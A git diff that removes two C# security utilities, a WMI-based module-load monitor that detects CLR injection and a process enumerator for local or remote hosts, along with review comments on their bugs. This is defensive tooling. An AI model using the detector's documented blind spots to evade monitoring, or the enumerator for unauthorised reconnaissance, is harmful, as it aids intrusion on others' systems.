<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>--clr-sentry</StartArguments>
</PropertyGroup>
</Project>

View File

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
EndGlobalSection
EndGlobal

View File

@ -1,352 +0,0 @@
/* Name: ModuleMonitor
*
*
*
*
*
*
*/
using System;
using System.Linq;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
namespace CLRSentry
{
class Program
{
//TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
static void Main(string[] args)
{
if (args.Contains("-h") || args.Contains("--help"))
{
PrintUsage();
Environment.Exit(0);
}
if (args.Contains("--clr-sentry"))
{
CLRSentry();
}
else
{
MonitorModuleLoads();
}
}
/// <summary>
/// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
/// </summary>
public static void MonitorModuleLoads()
{
//Monitor without any filters
MonitorModuleLoads(new List<string>());
}
/// <summary>
/// Struct representing the WMI class Win32_ModuleLoadTrace
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct Win32_ModuleLoadTrace
{
public sbyte[] SECURITY_DESCRIPTOR;
public UInt64 TIME_CREATED;
public string FileName;
public UInt64 DefaultBase;
public UInt64 ImageBase;
public UInt32 ImageChecksum;
public UInt64 ImageSize;
public UInt32 ProcessID;
public UInt32 TimeDateSTamp;
}
/// <summary>
/// Overload of GetNextModuleLoad that does not require filters.
/// </summary>
/// <returns></returns>
public static Win32_ModuleLoadTrace GetNextModuleLoad()
{
return GetNextModuleLoad(new List<string>());
}
/// <summary>
/// Get the details of the next module load
/// </summary>
/// <param name="filters">Filenames to filter for.</param>
/// <returns></returns>
public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
{
Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
//Ideally, we would filter here to reduce the amount of events that we have to consume.
//However, we cannot use the WHERE clause because the
var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
ManagementBaseObject e = startWatch.WaitForNextEvent();
//Instead, we filter here, because it's easy and we're a bit lazy
if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
{
if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
if (((ManagementBaseObject)e)["FileName"] != null)
trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
if (((ManagementBaseObject)e)["DefaultBase"] != null)
trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
if (((ManagementBaseObject)e)["ImageBase"] != null)
trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
if (((ManagementBaseObject)e)["ImageChecksum"] != null)
trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
if (((ManagementBaseObject)e)["ImageSize"] != null)
trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
if (((ManagementBaseObject)e)["ProcessID"] != null)
trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
return trace;
}
else
return trace;
}
public static void CLRSentry()
{
//Sentries never sleep.
//UCMJ Article 113
/* Any sentinel or look-out who is found drunk or sleeping upon his post,
* or leaves it before he is regularly relieved, shall be punished,
* if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
* by if the offense is committed at any other time,
* by such punishment other than death as court-martial may direct.
*/
while (true)
{
//Get the module load.
Win32_ModuleLoadTrace trace = GetNextModuleLoad();
//Split the
string[] parts = trace.FileName.Split('\\');
//Check whether it is a .NET Runtime DLL
if (parts[parts.Length - 1].Contains("msco"))
{
Process proc = Process.GetProcessById((int) trace.ProcessID);
//Check if the file is a .NET Assembly
if (!IsValidAssembly(proc.StartInfo.FileName))
{
//If it is not, then the CLR has been injected.
Console.WriteLine();
Console.WriteLine("[!] CLR Injection has been detected!");
//Display information from the event
Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
DateTime time = new DateTime();
DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
time.ToLocalTime();
//TODO: Time is printing strangley
Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
//TODO: Convert to hex
Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
Console.WriteLine("{0,15} Additional Information:", "[>]");
Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
if (process != null)
{
Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
}
}
}
}
}
/// <summary>
/// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
///
/// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
/// </summary>
/// <param name="path">The file to check</param>
/// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
public static bool IsValidAssembly(string path)
{
try
{
// Attempt to resolve the assembly
var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
// Nothing blew up, so it's an assembly
return true;
}
catch (Exception ex)
{
// Something went wrong, it is not an assembly (specifically a
// BadImageFormatException will be thrown if it could be found
// but it was NOT a valid assembly
return false;
}
}
/// <summary>
/// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
/// </summary>
/// <param name="filters">A list of module names to filter for.</param>
public static void MonitorModuleLoads(List<string> filters)
{
Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
while (true)
{
Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
//Get the details of the next module load
trace = GetNextModuleLoad(filters);
//If the trace is not empty
if (!trace.Equals(tracecomp))
{
Console.WriteLine();
//Display information from the event
Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
DateTime time = new DateTime();
DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
time.ToLocalTime();
//TODO: Time is printing strangley
Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
//TODO: Convert to hex
Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
Console.WriteLine("{0,15} Additional Information:", "[>]");
Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
if (process != null)
{
Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
}
}
}
}
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle(IntPtr hObject);
/// <summary>
/// Gets the owner of a process.
///
/// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
/// </summary>
/// <param name="process">The process to inspect.</param>
/// <returns>The name of the user, or null if it could not be read.</returns>
public static string GetProcessUser(Process process)
{
IntPtr processHandle = IntPtr.Zero;
try
{
OpenProcessToken(process.Handle, 8, out processHandle);
WindowsIdentity wi = new WindowsIdentity(processHandle);
return wi.Name;
}
catch (Exception ex)
{
return ex.Message;
}
finally
{
if (processHandle != IntPtr.Zero)
{
CloseHandle(processHandle);
}
}
}//end method
/// <summary>
/// Try to get the process by ID and return null if it no longer exists.
/// </summary>
/// <param name="id"></param>
/// <returns></returns>
private static Process SafeGetProcessByID(int id)
{
try
{
return Process.GetProcessById(id);
}
catch
{
return null;
}
}
private static void PrintUsage()
{
Console.WriteLine();
Console.WriteLine("| Module Monitor [v0.1]");
Console.WriteLine("| Copyright (c) 2019 TheWover");
Console.WriteLine();
Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
Console.WriteLine();
Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
Console.WriteLine();
Console.WriteLine("Examples:");
Console.WriteLine();
Console.WriteLine("ModuleMonitor.exe");
Console.WriteLine("ModuleMonitor.exe --clr-monitor");
Console.WriteLine();
}
}//end class
}//end namespace
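Review bot: if this ModuleMonitor code is ever restored rather than simply dropped, the CLR Sentry check in `CLRSentry()` is wrong at `if (!IsValidAssembly(proc.StartInfo.FileName))`: `Process.StartInfo.FileName` is only populated for processes this component started itself, and for a `Process` obtained through `Process.GetProcessById` on .NET Framework it is an empty string, so `AssemblyName.GetAssemblyName("")` throws, `IsValidAssembly` returns false, and every process that loads an `msco*` module is reported as CLR injection. `proc.MainModule.FileName` (with access-denied handling) is the path the check actually wants. Two smaller defects in the same hunk: the WMI `TIME_CREATED` property is a 64-bit FILETIME (100 ns intervals since 1601), so `DateTime.TryParse(trace.TIME_CREATED.ToString(), out time)` can never parse it, which is the "Time is printing strangely" TODO; `DateTime.FromFileTime((long)trace.TIME_CREATED)` is the right call, and `time.ToLocalTime();` on the following line discards its return value. Finally, the usage text documents `--clr-sentry` but the example line reads `ModuleMonitor.exe --clr-monitor`, a flag that does not exist.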

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ModuleMonitor")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ModuleMonitor")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

@ -1,26 +0,0 @@
# ModuleMonitor
Has its own repo at: https://github.com/TheWover/ModuleMonitor
Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
While useful, there are both false positives and false negatives:
* False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
* False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
# Usage
```
| Module Monitor [v0.1]
| Copyright (c) 2019 TheWover
Usage: ModuleMonitor.exe [--clr-sentry]
```
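Review bot: removing this README also removes the screenshot it embeds, and the image is referenced by an absolute link into this repository (`https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png`), which will 404 once the binary file deleted further down in this commit is gone. Since the README itself states that the tool lives in its own repository at https://github.com/TheWover/ModuleMonitor, any remaining donut documentation that links to the vendored ModuleMonitor directory or to that image should be repointed at the standalone repository in the same change; the README's own caveats (false positives from legitimate unmanaged CLR hosting, false negatives for injection into processes that already have the CLR loaded) are worth keeping wherever the tool is referenced.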

@ -1,3 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>

@ -1,76 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
-->
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
-->
</assembly>
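Review bot: for anyone resurrecting the tool, the `<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />` setting in this manifest is not incidental. Subscribing to the `Win32_ModuleLoadTrace` WMI event that the monitor consumes requires administrative rights, so without this manifest the watcher fails with an access-denied `ManagementException` as soon as `WaitForNextEvent()` starts it, and the monitor additionally opens other processes' tokens through `OpenProcessToken` to report the owning user, which fails for processes a non-elevated caller cannot open. The manifest and the code should be removed or restored together.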

Binary file not shown.

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v2.0.50727"/></startup>
</configuration>

@ -1,29 +0,0 @@
BSD 3-Clause License
Copyright (c) 2019, TheWover
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

@ -1,57 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>ProcessManager</RootNamespace>
<AssemblyName>ProcessManager</AssemblyName>
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

@ -1,11 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
<StartArguments>
</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>
</StartArguments>
</PropertyGroup>
</Project>

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
EndGlobalSection
EndGlobal

@ -1,579 +0,0 @@
/** Name: ProcessManager
* Author: TheWover
* Description: Displays useful information about processes running on a local or remote machine.
*
* Last Modified: 04/13/2018
*
*/
using System;
using System.Linq;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Security.Principal;
namespace ProcessManager
{
class Program
{
private struct Arguments
{
public string processname;
public string machinename;
public bool help;
}
static void Main(string[] args)
{
//Parse command-line arguments
Arguments arguments = ParseArgs(args);
if (args.Length > 0)
{
if (arguments.help == true)
{
PrintUsage();
Environment.Exit(0);
}
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
//If the user specifed that a different machine should be used, then parse for the machine name and run the command.
if (arguments.machinename != null)
{
try
{
if (arguments.processname != null)
//Enumerate the processes
DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
else
//Enumerate the processes
DescribeProcesses(Process.GetProcesses(arguments.machinename));
}
catch
{
Console.WriteLine("Error: Invalid machine name.");
Environment.Exit(1);
}
}
else
{
if (arguments.processname != null)
//Enumerate the processes
DescribeProcesses(Process.GetProcessesByName(arguments.processname));
else
//Enumerate the processes
DescribeProcesses(Process.GetProcesses());
}
}
else
{
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
DescribeProcesses(Process.GetProcesses());
}
}
private static Arguments ParseArgs(string[] args)
{
Arguments arguments = new Arguments();
arguments.help = false;
arguments.machinename = null;
arguments.processname = null;
if (args.Length > 0)
{
if (args.Contains("--help") || args.Contains("-h"))
{
arguments.help = true;
}
}
//Filter by process name
if (args.Contains("--name") && args.Length >= 2)
{
//The number of the command line argument that specifies the process name
int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
arguments.processname = args[nameindex];
}
//If the user specifed that a different machine should be used, then parse for the machine name and run the command.
if (args.Contains("--machine") && args.Length >= 2)
{
try
{
//The number of the command line argument that specifies the machine name
int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
arguments.machinename = args[machineindex];
}
catch
{
Console.WriteLine("Error: Invalid machine name.");
Environment.Exit(1);
}
}
return arguments;
}
private static void PrintUsage()
{
Console.WriteLine();
Console.WriteLine("| Process Manager [v0.2]");
Console.WriteLine("| Copyright (c) 2019 TheWover");
Console.WriteLine();
Console.WriteLine("Usage: ProcessManager.exe [machine]");
Console.WriteLine();
Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
Console.WriteLine();
Console.WriteLine("Examples:");
Console.WriteLine();
Console.WriteLine("ProcessManager.exe");
Console.WriteLine("ProcessManager.exe --name svchost");
Console.WriteLine("ProcessManager.exe --machine workstation2");
Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
Console.WriteLine();
}
private static void DescribeProcesses(Process[] processes)
{
//Sort in ascending order by PID
processes = processes.OrderBy(p => p.Id).ToArray();
foreach (Process process in processes)
{
//Get the PID
ProcessDetails details = new ProcessDetails();
details.name = process.ProcessName;
details.pid = process.Id;
try
{
//Get the PPID
Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
if (parent != null)
details.ppid = parent.Id;
else
details.ppid = -1;
}
//Parent is no longer running
catch (InvalidOperationException)
{
details.ppid = -1;
}
//Check the architecture
try
{
if (ProcessInspector.IsWow64Process(process))
details.arch = "x86";
else
details.arch = "x64";
}
catch
{
details.arch = "*";
}
try
{
//Determine whether or not the process is managed (has the CLR loaded).
details.managed = ProcessInspector.IsCLRLoaded(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.managed = false;
}
try
{
//Gets the Session of the Process
details.session = process.SessionId;
}
//Process is no longer running
catch (InvalidOperationException)
{
details.session = -1;
}
try
{
//Gets the Integrity Level of the process
details.integrity = TokenInspector.GetIntegrityLevel(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.integrity = TokenInspector.IntegrityLevel.Unknown;
}
try
{
//Gets the User of the Process
details.user = ProcessInspector.GetProcessUser(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.user = "";
}
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
}
}
}
public struct ProcessDetails
{
public string name;
public int pid;
public int ppid;
public string arch;
public bool managed;
public int session;
public TokenInspector.IntegrityLevel integrity;
public string user;
}
public static class ProcessInspector
{
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
[DllImport("advapi32.dll", SetLastError = true)]
